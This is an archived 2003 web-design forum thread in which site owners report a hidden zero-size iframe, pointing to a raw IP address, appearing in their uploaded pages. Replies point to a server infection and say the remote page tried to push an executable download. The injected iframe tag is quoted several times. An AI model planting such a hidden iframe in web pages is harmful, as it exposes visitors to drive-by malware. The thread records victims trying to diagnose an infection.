Professional Web Applications Themes

iframe invasion - HTML & CSS

[url]www.inexvision.com[/url] This is a sight I have developed and have been having problems with (see older posts). Now on all the pages I uppload to the server, there is an iframe tag at the bottom which reads as follows: <iframe src=http://216.247.117.114/inf.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe> I did not putt this tag on my pages! Any idea of how it is getting there? I try to go to the ip address but no luck. Please help if you can as my client is doing flips because it takes so darn long to access the link in the iframe tag. And ...

  1. #1

    Default iframe invasion

    [url]www.inexvision.com[/url]

    This is a sight I have developed and have been having problems with (see older posts). Now on all the pages I uppload to the server, there is an iframe tag at the bottom which reads as follows:

    <iframe src=http://216.247.117.114/inf.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

    I did not putt this tag on my pages! Any idea of how it is getting there? I try to go to the ip address but no luck. Please help if you can as my client is doing flips because it takes so darn long to access the link in the iframe tag.

    And yes I have tried resaving my original and uploading again.

    Thaks,

    JJ

    j2studio webforumsuser@macromedia.com Guest

  2. #2

    Default Re: iframe invasion

    j2:

    Where is the site hosted? Have you discussed this issue with your host?

    --
    Murray --- ICQ 71997575
    ==================

    "j2studio" <webforumsusermacromedia.com> wrote in message
    > [url]www.inexvision.com[/url]
    >
    > This is a sight I have developed and have been having problems with (see
    older posts). Now on all the pages I uppload to the server, there is an
    iframe tag at the bottom which reads as follows:

    > <iframe src=http://216.247.117.114/inf.html width=0 height=0
    frameborder=0 marginwidth=0 marginheight=0></iframe>

    > I did not putt this tag on my pages! Any idea of how it is getting there?
    I try to go to the ip address but no luck. Please help if you can as my
    client is doing flips because it takes so darn long to access the link in
    the iframe tag.

    > And yes I have tried resaving my original and uploading again.
    >
    > Thaks,
    >
    > JJ

    Murray *TMM* Guest

  3. #3

    I think the server is infected....

    [url]http://groups.google.com/groups?q=%22216.247.117.114%22&hl=en&lr=&ie=UTF-8&s[/url]
    afe=off&filter=0

    would be good to give the url to your page- and see if other people see the
    iframe code... That would isolate to being introduced on the server, and
    not something that's happening in your computer when you view the page.
    > j2:
    >
    > Where is the site hosted? Have you discussed this issue with your host?
    Certified Dreamweaver MX Developer

    Alan Ames Guest

  4. #4

    On Mon, 28 Jul 2003 21:12:13 +0000 (UTC), "j2studio"
    [email]webforumsusermacromedia.com[/email] wrote:
    ><iframe src=http://216.247.117.114/inf.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>
    Is this on a free host? It appears to be related to a domain called
    dotcomsystems.com, which appears on a list of spammers at
    [url]http://www.msu.edu/~scanlon3/T_SPAMMERS.txt[/url]

    Gary
    Gary White Guest

  5. #5

    [url]www.inexvision.com[/url]

    This is a sight I have developed and have been having problems with
    (see older posts). Now on all the pages I uppload to the server, there
    is an iframe tag at the bottom which reads as follows:

    <iframe src=http://216.247.117.114/inf.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

    Contact your provider and your client, the server seems to be
    infected.

    On that other server was a javascript, that tried to download an exe-file,
    but currently it seems that the file has been removed.

    Micha

    netizen webforumsuser@macromedia.com Guest

  6. #6

    OK people, this is unbelievably strange!

    That tag is now gone from all the pages! Who in the world is doing this?

    Not only that, but I searched google with 216.247.117.114/inf.html and it came back with about 4 pages that also had that tag. I saw them in the source code last night. But this morning, not only was that tag gone from my site, but all the sites that Google came up with as well.

    I am stumped. Is this some kind of hacking? I tried plugging that tag into my browser and it would never open. Then I tried just the IP to no avail. But this morning a page now comes up and says this page is no longer available. ?????????

    Thanks for your replies. Call Ripley!

    j2studio webforumsuser@macromedia.com Guest

  7. #7

    I am having the same problem on two web sites that I updated yesterday. It appears to be a distributed denial of service virus, but I can't seem to get rid of it either. The IFrame statement seem appeared out of nowhere on htm files that I uploaded using dreamweaver.

    Please let me know if you figure out how to get rid of it.

    Jim Fisher webforumsuser@macromedia.com Guest

  8. #8

    I don't know how it stopped or how the tags went away honestly. I did resave the index page after del;eting that tag, but when I went to the site to check it, it was there again. And on all my pages. Bbut this morning all of them are gone.

    Where are the sites you did? I'd like to see if the tag is there as well.

    j2studio webforumsuser@macromedia.com Guest